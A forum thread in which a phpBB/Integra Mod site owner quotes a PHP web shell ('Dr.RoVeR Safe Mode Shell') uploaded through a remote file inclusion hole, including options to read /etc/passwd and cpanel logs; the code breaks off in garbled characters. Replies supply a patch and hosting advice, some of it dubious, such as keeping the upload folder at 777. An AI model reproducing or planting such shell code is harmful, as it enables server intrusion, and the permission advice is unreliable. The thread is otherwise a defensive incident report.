Someone tried to hack me (v 1.40)

[jackflack]

First off, I know that there are more up to date versions that are available of IM MOD and phpBB. So i do run this risk knowingly. However after the last nightmarish forced upgrade of my php and sql I am a little gun shy about making the upgrade right now. Plus I don't have the time.

on 04.08/07 I noticed some new files being accessed in my IM_MOD_140/files directory. The IM_MOD_140 is the root directory for Integra Mod 1.40. the permissions for the files folder was 777. I don't think i changed this and believe it was default. However I could be wrong.

This file was uploaded, I will quote the code, if that is improper have a mod remove the code.
[php]<head>

<meta>

</head>

<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>

<p><b><font>!</font><font><a><span><font>

Dr.RoVeR SaFe Mode SheLL <img> </font></span></a></font><font>!</font></b></p>

<form>

<p><input>

<input></p>

</form>

<form>

<p><select>

<option>Get /etc/passwd</option>

<option>View cpanel logs</option>

<option>Syslog configuration</option>

<option>Hosts</option>

</select> <input></p>

</form>





<?php

/*

Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2

by Dr.RoVeR <H>

*/



echo "<head><title>Safe Mode Shell</title></head>";









$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp



if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")

{

$safemode = true;

$hsafemode = "<font>ON (secure)</font>";

}

else {$safemode = false; $hsafemode = "<font>OFF (not secure)</font>";}

echo("Safe-mode: $hsafemode");

$v = @ini_get("open_basedir");

if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font>".$v."</font>";}

else {$openbasedir = false; $hopenbasedir = "<font>OFF (not secure)</font>";}

echo("<br>");

echo("Open base dir: $hopenbasedir");

echo("<br>");

echo "Disable functions : <b>";

if(''==($df=@ini_get('disable_functions'))){echo "<font>NONE</font></b>";}else{echo "<font>$df</font></b>";}

$free = @diskfreespace($dir);

if (!$free) {$free = 0;}

$all = @disk_total_space($dir);

if (!$all) {$all = 0;}

$used = $all-$free;

$used_percent = @round(100/($all/$free),2);



echo "<PRE>n";

if(empty($file)){

if(empty($_GET['file'])){

if(empty($_POST['file'])){





die(" <FONT>



<big> --------------------------Ãà ¢Ã¢â€š ¬Ã‚ ¡ÃƒÆ’ƒÂ

[ZacFields]

Firstly, I want to point out that 1.4.1 is not vulnerable to this hack. It's called an RFI exploit (Remote File Inclusion) and my site was hit with it a couple weeks ago because I had an archive on my site that was still the old 1.4.0.

I believe the code you need to add to the functions_portal.php is

// Hack Fixes 280806 //
$phpEx = 'php';

if ( !defined('IN_PHPBB') )
{
die("Hacking attempt#27");
}
$phpbb_root_path = './';
// Hack Fixes 280806 //

Add the above code right under all the copyright information (otherwise essentially right after the <?php code) So the first thing you should do is add that code to functions_portal.php and then also to portal.php in your root if it's not already there.

Unfortunately this will not stop the attacks. This will stop the *successful* attacks but they will probably be running requests to that file for at least a few days until they realize the hole has been patched. This will probably slow down your server a little bit because they will most likely attack from several hundred different IP addresses.

Zac

[jackflack]

Firstly, I want to point out that 1.4.1 is not vulnerable to this hack. It's called an RFI exploit (Remote File Inclusion) and my site was hit with it a couple weeks ago because I had an archive on my site that was still the old 1.4.0.

I believe the code you need to add to the functions_portal.php is

// Hack Fixes 280806 //
$phpEx = 'php';

if ( !defined('IN_PHPBB') )
{
die("Hacking attempt#27");
}
$phpbb_root_path = './';
// Hack Fixes 280806 //

Add the above code right under all the copyright information (otherwise essentially right after the <?php code) So the first thing you should do is add that code to functions_portal.php and then also to portal.php in your root if it's not already there.

Unfortunately this will not stop the attacks. This will stop the *successful* attacks but they will probably be running requests to that file for at least a few days until they realize the hole has been patched. This will probably slow down your server a little bit because they will most likely attack from several hundred different IP addresses.

Zac

Thank you, I have applied the patch.

Is the IM_MOD_140/files need to be 777 of can it be something a little more secure? Thats really my only question left.

[ZacFields]

your /files directory is where your attachments are all located. It should be at 777 but you could certainly change it. I am not quite sure yet what specific effect it would have if you change it to 666 but I'm certain it would probably disable the ability to use attachments.

If you have applied the patch I gave you then you should be pretty secure from RFI attacks for the time being.

This hack (from the research i've done) is not malicious to the forum itself but rather to the server. All they are doing is using your server's resources to run exploits on other servers but from what I've seen in researching these exploits they generally are very uninterested in the contents of your website and/or altering them in any way.

Zac